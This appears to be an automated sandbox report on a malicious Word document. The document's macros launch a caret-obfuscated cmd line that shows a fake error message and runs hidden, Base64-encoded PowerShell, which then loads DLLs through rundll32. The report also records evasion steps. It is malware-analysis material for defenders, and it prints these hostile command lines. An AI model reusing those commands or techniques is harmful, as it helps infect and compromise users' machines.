                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CFBE68_2_001CFBE6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0202303C8_2_0202303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020187D08_2_020187D0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02031E148_2_02031E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B40129_2_001B4012
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AC0179_2_001AC017
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B06049_2_001B0604
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A9C3D9_2_001A9C3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AC8519_2_001AC851
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BCA559_2_001BCA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BBC4D9_2_001BBC4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A98469_2_001A9846
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A54789_2_001A5478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B44789_2_001B4478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BCC7F9_2_001BCC7F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AE2729_2_001AE272
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B96659_2_001B9665
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A9A999_2_001A9A99
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AB6B99_2_001AB6B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B34BF9_2_001B34BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B90BE9_2_001B90BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A28AA9_2_001A28AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A2EAC9_2_001A2EAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A70AD9_2_001A70AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A92A39_2_001A92A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BC4A59_2_001BC4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A6CA59_2_001A6CA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B9EDA9_2_001B9EDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AB8D89_2_001AB8D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BA6D99_2_001BA6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AE8DD9_2_001AE8DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B08CF9_2_001B08CF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B34C39_2_001B34C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B38C29_2_001B38C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B66FB9_2_001B66FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B00FE9_2_001B00FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B14FC9_2_001B14FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A50F19_2_001A50F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A30E89_2_001A30E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A68EC9_2_001A68EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B891E9_2_001B891E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B25159_2_001B2515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AB10A9_2_001AB10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BB7069_2_001BB706
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A43049_2_001A4304
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BD1389_2_001BD138
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B93339_2_001B9333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B71329_2_001B7132
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B3D299_2_001B3D29
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AEF2E9_2_001AEF2E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AF52E9_2_001AF52E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AFF2C9_2_001AFF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A35239_2_001A3523
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AA3239_2_001AA323
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BC15B9_2_001BC15B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B61589_2_001B6158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A23539_2_001A2353
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AEB549_2_001AEB54
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A4D489_2_001A4D48
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A0D7A9_2_001A0D7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B21799_2_001B2179
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A177C9_2_001A177C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B13729_2_001B1372
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A2B709_2_001A2B70
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A5D639_2_001A5D63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BB1659_2_001BB165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B819F9_2_001B819F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AF7939_2_001AF793
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AF7979_2_001AF797
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A9D959_2_001A9D95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A598B9_2_001A598B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A498C9_2_001A498C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A19839_2_001A1983
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001ADB869_2_001ADB86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A3DB89_2_001A3DB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AD5B89_2_001AD5B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B41AB9_2_001B41AB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BC5A19_2_001BC5A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B7FA79_2_001B7FA7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B1BA59_2_001B1BA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A27F39_2_001A27F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AD3F59_2_001AD3F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AB3E89_2_001AB3E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AFBE69_2_001AFBE6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059C85110_2_0059C851
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005ACA5510_2_005ACA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005ABC4D10_2_005ABC4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059984610_2_00599846
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059547810_2_00595478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A447810_2_005A4478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005ACC7F10_2_005ACC7F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059E27210_2_0059E272
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A966510_2_005A9665
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A401210_2_005A4012
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059C01710_2_0059C017
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A060410_2_005A0604
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00599C3D10_2_00599C3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A9EDA10_2_005A9EDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059B8D810_2_0059B8D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005AA6D910_2_005AA6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059E8DD10_2_0059E8DD
                      Source: N00048481397007.doc, OLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentation, OLE, VBA macro: Module U765y5vgf_ao0faq, Function Document_open, Name: Document_open
                      Source: N00048481397007.doc, OLE indicator, VBA macros: true
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 00428000 appears 45 times
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 0045B890 appears 50 times
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 00439898 appears 50 times
                      Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091212034.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088276083.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmp, Binary or memory string: .VBPud<_
                      Source: classification engine, Classification label: mal100.troj.evad.winDOC@38/12@6/5
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\Desktop\~$0048481397007.doc
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Temp\CVRBA0B.tmp
                      Source: N00048481397007.doc, OLE indicator, Word Document stream: true
                      Source: N00048481397007.doc, OLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exe, Console Write: Async message sent to session Console
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: es are "Ssl3, Tls"."
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: At line:1 char:495
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: h{}}$J82E=('W'+('28'+'L'))
                      Source: C:\Windows\SysWOW64\rundll32.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File read: C:\Users\desktop.ini
                      Source: C:\Windows\System32\msg.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknown, Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                      Source: N00048481397007.doc, Virustotal: Detection: 16%
                      Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknown, Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc
                      Source: unknown, Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknown, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc
                      Source: unknown, Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',JnNGuImBTNGmQ
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',#1
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',cGgBEdar
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',#1
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',VWMVjHoJWTwKe
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',#1
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',GOGZBCfUK
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',saFFaIU
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',sKCf
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf',HPKSdoSG
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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 to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyStringJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyStringJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',JnNGuImBTNGmQJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',cGgBEdarJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',VWMVjHoJWTwKeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',GOGZBCfUKJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',saFFaIUJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',sKCf
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf',HPKSdoSG
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2087459336.0000000002290000.00000002.00000001.sdmp
                      Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp

                      Data Obfuscation:

                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
                      Source: N00048481397007.doc Stream path 'Macros/VBA/Gp0t5ucwnkng7fi' : High number of GOTO operations
                      Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Gp0t5ucwnkng7fi Name: Gp0t5ucwnkng7fi
                      Obfuscated command line found
                      Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc [Base64-encoded command]
                      Suspicious powershell command line found
                      Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc [Base64-encoded command]
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc [Base64-encoded command]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF100B push ss; iretd 7_2_01FF100C
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024F090 push edx; ret 7_2_0024F237
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023057F push ss; iretd 7_2_00230580
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02042D98 push 02042E25h; ret 7_2_02042E1D
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201B274 push 0201B2CDh; ret 7_2_0201B2C5
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0202C34C push 0202C378h; ret 7_2_0202C370
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02050020 push 02050058h; ret 7_2_02050050
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02044038 push 02044064h; ret 7_2_0204405C
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201A0B2 push 0201A0E0h; ret 7_2_0201A0D8
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201A0B4 push 0201A0E0h; ret 7_2_0201A0D8
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02050654 push 02050680h; ret 7_2_02050678
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0205068C push 020506B8h; ret 7_2_020506B0
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201E696 push ecx; mov dword ptr [esp], edx 7_2_0201E69C
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_020506C4 push 020506F0h; ret 7_2_020506E8
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201D6DC push 0201D751h; ret 7_2_0201D749
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201E6F0 push ecx; mov dword ptr [esp], edx 7_2_0201E6F4
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02018748 push 02018774h; ret 7_2_0201876C
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201E750 push ecx; mov dword ptr [esp], edx 7_2_0201E754
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201D754 push 0201D7ADh; ret 7_2_0201D7A5
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02018798 push 020187C4h; ret 7_2_020187BC
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_020537A8 push 020537E0h; ret 7_2_020537D8
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_020507E4 push 02050827h; ret 7_2_0205081F
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201E450 push ecx; mov dword ptr [esp], edx 7_2_0201E454
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02050498 push 020504EFh; ret 7_2_020504E7
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_020504F4 push 0205055Ch; ret 7_2_02050554
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02050580 push 020505ACh; ret 7_2_020505A4
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0204B588 push 0204B5CAh; ret 7_2_0204B5C2
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_020505B8 push 020505E4h; ret 7_2_020505DC
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_020505F0 push 0205063Ch; ret 7_2_02050634
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201B5F8 push 0201B92Fh; ret 7_2_0201B927
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0204CA20 push 0204CA58h; ret 7_2_0204CA50

                      Persistence and Installation Behavior:

                      Creates processes via WMI
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
